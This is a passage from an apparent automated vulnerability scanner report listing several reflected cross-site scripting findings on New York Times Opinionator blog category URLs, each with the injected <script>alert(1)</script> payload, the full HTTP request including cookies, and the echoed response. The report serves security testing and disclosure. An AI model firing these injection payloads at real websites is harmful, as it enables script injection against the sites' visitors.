Date: Sat, 13 Nov 2010 02:21:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:21:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/peter-orszag56ee1\"><script>alert(1)</script>2199c3904e8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.212. http://opinionator.blogs.nytimes.com/category/peter-orszag/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/peter-orszag/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22a78"><script>alert(1)</script>81dab4b1f01 was submitted in the REST URL parameter 2. This input was echoed as 22a78\"><script>alert(1)</script>81dab4b1f01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/peter-orszag22a78"><script>alert(1)</script>81dab4b1f01/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:21:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:21:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/peter-orszag22a78\"><script>alert(1)</script>81dab4b1f01&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.213. http://opinionator.blogs.nytimes.com/category/peter-orszag/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/peter-orszag/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983c8"><script>alert(1)</script>73ff25ea2e6 was submitted in the REST URL parameter 3. This input was echoed as 983c8\"><script>alert(1)</script>73ff25ea2e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/peter-orszag/feed983c8"><script>alert(1)</script>73ff25ea2e6/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:19:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:19:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/peter-orszag/feed983c8\"><script>alert(1)</script>73ff25ea2e6&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.214. http://opinionator.blogs.nytimes.com/category/peter-orszag/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/peter-orszag/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff106"><script>alert(1)</script>8da1306f600 was submitted in the REST URL parameter 3. This input was echoed as ff106\"><script>alert(1)</script>8da1306f600 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/peter-orszag/pageff106"><script>alert(1)</script>8da1306f600/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:20:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:20:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/peter-orszag/pageff106\"><script>alert(1)</script>8da1306f600/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.215. http://opinionator.blogs.nytimes.com/category/robert-wright [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/robert-wright

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14761"><script>alert(1)</script>4a380400f55 was submitted in the REST URL parameter 2. This input was echoed as 14761\"><script>alert(1)</script>4a380400f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/robert-wright14761"><script>alert(1)</script>4a380400f55 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:23:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:23:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/robert-wright14761\"><script>alert(1)</script>4a380400f55&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.216. http://opinionator.blogs.nytimes.com/category/robert-wright/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/robert-wright/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a281"><script>alert(1)</script>62e164a0066 was submitted in the REST URL parameter 2. This input was echoed as 5a281\"><script>alert(1)</script>62e164a0066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/robert-wright5a281"><script>alert(1)</script>62e164a0066/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:23:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:23:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/robert-wright5a281\"><script>alert(1)</script>62e164a0066&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.217. http://opinionator.blogs.nytimes.com/category/robert-wright/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/robert-wright/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdcc7"><script>alert(1)</script>af7fb25909c was submitted in the REST URL parameter 3. This input was echoed as cdcc7\"><script>alert(1)</script>af7fb25909c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/robert-wright/feedcdcc7"><script>alert(1)</script>af7fb25909c/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:20:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:20:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/robert-wright/feedcdcc7\"><script>alert(1)</script>af7fb25909c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.218. http://opinionator.blogs.nytimes.com/category/robert-wright/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/robert-wright/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4caac"><script>alert(1)</script>2183f3ae5d2 was submitted in the REST URL parameter 3. This input was echoed as 4caac\"><script>alert(1)</script>2183f3ae5d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/robert-wright/page4caac"><script>alert(1)</script>2183f3ae5d2/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:24:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:24:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/robert-wright/page4caac\"><script>alert(1)</script>2183f3ae5d2/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.219. http://opinionator.blogs.nytimes.com/category/stanley-fish [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/stanley-fish

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b14fb"><script>alert(1)</script>a43a7c90828 was submitted in the REST URL parameter 2. This input was echoed as b14fb\"><script>alert(1)</script>a43a7c90828 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/stanley-fishb14fb"><script>alert(1)</script>a43a7c90828 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/stanley-fishb14fb\"><script>alert(1)</script>a43a7c90828&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.220. http://opinionator.blogs.nytimes.com/category/stanley-fish/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/stanley-fish/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2254d"><script>alert(1)</script>86219aafb61 was submitted in the REST URL parameter 2. This input was echoed as 2254d\"><script>alert(1)</script>86219aafb61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/stanley-fish2254d"><script>alert(1)</script>86219aafb61/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/stanley-fish2254d\"><script>alert(1)</script>86219aafb61&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.221. http://opinionator.blogs.nytimes.com/category/stanley-fish/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/stanley-fish/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3748b"><script>alert(1)</script>bc108e0983b was submitted in the REST URL parameter 3. This input was echoed as 3748b\"><script>alert(1)</script>bc108e0983b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/stanley-fish/feed3748b"><script>alert(1)</script>bc108e0983b/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
